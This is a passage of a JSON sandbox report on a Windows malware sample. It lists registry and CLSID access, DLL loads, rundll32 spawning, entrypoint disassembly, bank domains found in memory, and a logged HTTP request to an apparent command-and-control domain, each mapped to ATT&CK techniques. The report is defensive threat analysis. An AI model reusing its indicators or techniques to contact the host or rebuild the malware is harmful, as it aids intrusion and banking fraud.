3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"rundll32.exe\" touched \"NetworkListManager\" (Path: \"HKCU\\CLSID\\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\")\n \"rundll32.exe\" touched \"Network List Manager\" (Path: \"HKCU\\CLSID\\{A47979D2-C419-11D9-A5B4-001185AD2B89}\")\n \"rundll32.exe\" touched \"PSFactoryBuffer\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{1299CF18-C4F5-4B6A-BB0F-2299F0398E27}\")\n \"rundll32.exe\" touched \"WinInetBroker Class\" (Path: \"HKCU\\CLSID\\{C39EE728-D419-4BD4-A3EF-EDA059DBD935}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-625", "type": 2, "relevance": 1, "name": "References Windows filepaths for DLLs (possible dropped files)", "description": "Observed system executable string:\"%WINDIR%\\system32\\apphelp.dll\" [Source: 00000000-00006120-0000018F-4129223]\n Observed system executable string:\"%WINDIR%\\system32\\uxtheme.dll\" [Source: 00000000-00006120-00000C28-61828486]\n Observed system executable string:\"%WINDIR%\\system32\\ole32.dll\" [Source: 00000000-00006120-00000C28-62823025]\n Observed system executable string:\"%WINDIR%\\system32\\MSCTF.dll\" [Source: 00000000-00006120-00000C28-63144519]", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"CreateDirectoryA\" with parameter %WINDIR%\\system\\ (UID: 00000000-00006120)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter C:\\Users\\%OSUSER% (UID: 00000000-00005596)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Local (UID: 00000000-00005596)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Temporary Internet Files (UID: 00000000-00005596)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter %USERPROFILE%\\AppData\\Roaming (UID: 00000000-00005596)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\Microsoft\\Windows\\Cookies (UID: 00000000-00005596)\n \"rundll32.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\History (UID: 00000000-00005596)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"CreateProcessA\" with parameter \"%WINDIR%\\system\\rundll32.exe\" - (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "string-550", "type": 2, "relevance": 1, "name": "Contains ability to find and load resources of specific modules (API string)", "description": "Found reference to API \"15610384439,5996,3136,,FindResourceA,kernel32.dll,\"252:04:59.274\",RX=0,PX=0\" (Indicator: \"FindResource\"; Source: \"00000000-00005596.00000001.67056.00190000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"notepad_.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rundll32.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"_.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x40b5d8,push\t0x40a4d6,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x68,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,xor\tebx, ebx,mov\tdword ptr [ebp - 4], ebx,push\t2,call\tdword ptr [0x40b210],pop\tecx,or\tdword ptr [0x40e6b0], 0xffffffff,or\tdword ptr [0x40e6b4], 0xffffffff,call\tdword ptr [0x40b214],mov\tecx, dword ptr [0x40e6a4],mov\tdword ptr [eax], ecx,call\tdword ptr [0x40b218],mov\tecx, dword ptr [0x40e6a0],mov\tdword ptr [eax], ecx,mov\teax, dword ptr [0x40b21c],\"\n \"notepad_.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x40b5d8,push\t0x40a4d6,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x68,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,xor\tebx, ebx,mov\tdword ptr [ebp - 4], ebx,push\t2,call\tdword ptr [0x40b210],pop\tecx,or\tdword ptr [0x40e6b0], 0xffffffff,or\tdword ptr [0x40e6b4], 0xffffffff,call\tdword ptr [0x40b214],mov\tecx, dword ptr [0x40e6a4],mov\tdword ptr [eax], ecx,call\tdword ptr [0x40b218],mov\tecx, dword ptr [0x40e6a0],mov\tdword ptr [eax], ecx,mov\teax, dword ptr [0x40b21c],\"\n \"rundll32.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x40b5d8,push\t0x40a4d6,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x68,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,xor\tebx, ebx,mov\tdword ptr [ebp - 4], ebx,push\t2,call\tdword ptr [0x40b210],pop\tecx,or\tdword ptr [0x40e6b0], 0xffffffff,or\tdword ptr [0x40e6b4], 0xffffffff,call\tdword ptr [0x40b214],mov\tecx, dword ptr [0x40e6a4],mov\tdword ptr [eax], ecx,call\tdword ptr [0x40b218],mov\tecx, dword ptr [0x40e6a0],mov\tdword ptr [eax], ecx,mov\teax, dword ptr [0x40b21c],\"\n \"_.exe\" file has an entrypoint instructions - \"push\tebp,mov\tebp, esp,push\t-1,push\t0x40b5d8,push\t0x40a4d6,mov\teax, dword ptr fs:[0],push\teax,mov\tdword ptr fs:[0], esp,sub\tesp, 0x68,push\tebx,push\tesi,push\tedi,mov\tdword ptr [ebp - 0x18], esp,xor\tebx, ebx,mov\tdword ptr [ebp - 4], ebx,push\t2,call\tdword ptr [0x40b210],pop\tecx,or\tdword ptr [0x40e6b0], 0xffffffff,or\tdword ptr [0x40e6b4], 0xffffffff,call\tdword ptr [0x40b214],mov\tecx, dword ptr [0x40e6a4],mov\tdword ptr [eax], ecx,call\tdword ptr [0x40b218],mov\tecx, dword ptr [0x40e6a0],mov\tdword ptr [eax], ecx,mov\teax, dword ptr [0x40b21c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "stream-108", "type": 1, "relevance": 3, "name": "Contains ability to dynamically load libraries", "description": "LoadLibraryA@KERNEL32.dll at 39956-97-00404B90\n LoadLibraryA@KERNEL32.dll at 39956-108-00405290\n LoadLibraryA@KERNEL32.dll at 39956-99-004047D0\n LoadLibraryA@KERNEL32.DLL at 00000000-00006120-43002-26-00404B90\n LoadLibraryA@KERNEL32.DLL at 00000000-00006120-43002-28-004047D0\n LoadLibraryA@KERNEL32.DLL at 00000000-00006120-43002-37-00405290", "origin": "Hybrid Analysis Technology", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" searching for class \"#32770\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70950000\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a060000\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" loaded module \"KERNEL32.DLL\" at base 76ae0000\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 751e0000\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" loaded module \"ADVAPI32.DLL\" at base 76c40000\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74110000\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" loaded module \"DWMAPI.DLL\" at base 740f0000\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 77230000\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" loaded module \"CRYPTBASE.DLL\" at base 75230000\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" loaded module \"CLBCATQ.DLL\" at base 76510000\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 770e0000\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" loaded module \"OLEAUT32.DLL\" at base 76730000\n \"rundll32.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70950000\n \"rundll32.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rundll32.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"rundll32.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rundll32.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a060000\n \"rundll32.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75480000\n \"rundll32.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 719b0000\n \"rundll32.exe\" loaded module \"URLMON.DLL\" at base 765e0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74110000\n \"rundll32.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L2-1-0.DLL\" at base 6dc20000\n \"rundll32.exe\" loaded module \"WS2_32.DLL\" at base 765a0000\n \"rundll32.exe\" loaded module \"WINHTTP.DLL\" at base 70fa0000\n \"rundll32.exe\" loaded module \"SECUR32.DLL\" at base 75060000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74d00000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 74cf0000\n \"rundll32.exe\" loaded module \"IPHLPAPI.DLL\" at base 736a0000\n \"rundll32.exe\" loaded module \"OLEAUT32.DLL\" at base 76730000\n \"rundll32.exe\" loaded module \"DNSAPI.DLL\" at base 74bc0000\n \"rundll32.exe\" loaded module \"RPCRT4.DLL\" at base 76970000\n \"rundll32.exe\" loaded module \"CRYPTBASE.DLL\" at base 75230000\n \"rundll32.exe\" loaded module \"CLBCATQ.DLL\" at base 76510000\n \"rundll32.exe\" loaded module \"DHCPCSVC6.DLL\" at base 735b0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NETPROFM.DLL\" at base 6d1d0000\n \"rundll32.exe\" loaded module \"OLE32.DLL\" at base 77230000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74860000\n \"rundll32.exe\" loaded module \"RASADHLP.DLL\" at base 719d0000\n \"rundll32.exe\" loaded module \"DHCPCSVC.DLL\" at base 73520000\n \"rundll32.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76a20000\n \"rundll32.exe\" loaded module \"ADVAPI32.DLL\" at base 76c40000\n \"rundll32.exe\" loaded module \"CRYPTSP.DLL\" at base 74d40000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74ad0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 735d0000\n \"rundll32.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 752d0000\n \"rundll32.exe\" loaded module \"COMCTL32.DLL\" at base 74200000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 765a0000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NPMPROXY.DLL\" at base 6cd40000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLEAUT32.DLL\" at base 76730000\n \"rundll32.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WININET.DLL\" at base 76d60000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-2", "type": 9, "name": "An application crash occurred", "description": "Report process \"WerFault.exe\" was created by \"svchost.exe\"", "origin": "Monitored Target"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-2", "type": 7, "relevance": 5, "name": "GETs files from a webserver", "description": "\"GET /article.php?id=103822 HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)\nHost: www.zigui.org\nConnection: Keep-Alive\" Response ==> HTTP/1.1 400 Bad Request\nContent-Type: text/html\nDate: Thu\n 06 Feb 2025 09:09:47 GMT\nConnection: close\nContent-Length: 39 with response body ==>3C68313E42616420526571756573742028496E76616C696420486F73746E616D65293C2F68313E.......", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-0", "type": 7, "relevance": 1, "name": "Contacts domains", "description": "\"www.zigui.org\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"www.zigui.org\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\" has an executable section named \"\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\" has an executable section named \".PEC\"\n \"notepad_.exe\" has an executable section named \"\"\n \"notepad_.exe\" has an executable section named \".PEC\"\n \"rundll32.exe\" has an executable section named \"\"\n \"rundll32.exe\" has an executable section named \".PEC\"\n \"_.exe\" has an executable section named \"\"\n \"_.exe\" has an executable section named \".PEC\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\" has an writable section named \"\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\" has an writable section named \".rsrc\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\" has an writable section named \".PEC\"\n \"notepad_.exe\" has an writable section named \"\"\n \"notepad_.exe\" has an writable section named \".rsrc\"\n \"notepad_.exe\" has an writable section named \".PEC\"\n \"rundll32.exe\" has an writable section named \"\"\n \"rundll32.exe\" has an writable section named \".rsrc\"\n \"rundll32.exe\" has an writable section named \".PEC\"\n \"_.exe\" has an writable section named \"\"\n \"_.exe\" has an writable section named \".rsrc\"\n \"_.exe\" has an writable section named \".PEC\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"LoadLibrary\" with a parameter KERNEL32.DLL (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ole32.dll (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\MSCTF.dll (UID: 00000000-00006120)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter urlmon.dll (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-shlwapi-l2-1-0.dll (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter winhttp.dll (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter IPHLPAPI.DLL (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter DNSAPI.dll (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter dhcpcsvc.DLL (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter Comctl32.dll (UID: 00000000-00005596)\n \"rundll32.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\ws2_32 (UID: 00000000-00005596)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"rundll32.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"rundll32.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76970000\n \"rundll32.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76970000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")\n \"rundll32.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"rundll32.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"rundll32.exe\" (UID: 00000000-00005596)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"rundll32.exe\" (UID: 00000000-00005596)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\" was detected as \"MFC\" and name: \"Library\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\" was detected as \"Microsoft Visual C++\" and name: \"Compiler\"\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"notepad_.exe\" was detected as \"MFC\" and name: \"Library\"\n \"notepad_.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"notepad_.exe\" was detected as \"Microsoft Visual C++\" and name: \"Compiler\"\n \"notepad_.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"rundll32.exe\" was detected as \"MFC\" and name: \"Library\"\n \"rundll32.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"rundll32.exe\" was detected as \"Microsoft Visual C++\" and name: \"Compiler\"\n \"rundll32.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"_.exe\" was detected as \"MFC\" and name: \"Library\"\n \"_.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"_.exe\" was detected as \"Microsoft Visual C++\" and name: \"Compiler\"\n \"_.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-79", "relevance": 1, "name": "Contains ability to dynamically determine API calls", "description": "Found GetProcAddress() and LoadLibraryA() in an import section (Source: fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: notepad_.exe)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: rundll32.exe)\n Found GetProcAddress() and LoadLibraryA() in an import section (Source: _.exe)", "origin": "Static Parser", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007"}, {"threat_level_human": "informative", "category": "General", "identifier": "stream-103", "type": 1, "relevance": 3, "name": "Contains ability to delay the execution of current thread", "description": "Sleep@KERNEL32.dll at 39956-103-004085A0\n Sleep@KERNEL32.dll at 39956-109-00405440\n Sleep@KERNEL32.dll at 39956-94-004086F0\n Sleep@KERNEL32.DLL at 00000000-00006120-43002-32-004085A0\n Sleep@KERNEL32.DLL at 00000000-00006120-43002-38-00405440\n Sleep@KERNEL32.DLL at 00000000-00006120-43002-23-004086F0", "origin": "Hybrid Analysis Technology", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-23", "type": 2, "relevance": 2, "name": "Detected known bank URL artifact", "description": "\"www.credit-agricole.fr\" (Source: 00000000-00005596.00000001.67056.00190000.00000004.mdmp, Indicator: \"credit-agricole.fr\")\n \"capitalone.com\" (Source: 00000000-00005596.00000001.67056.00190000.00000004.mdmp, Indicator: \"capitalone.com\")", "origin": "File/Memory"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\" 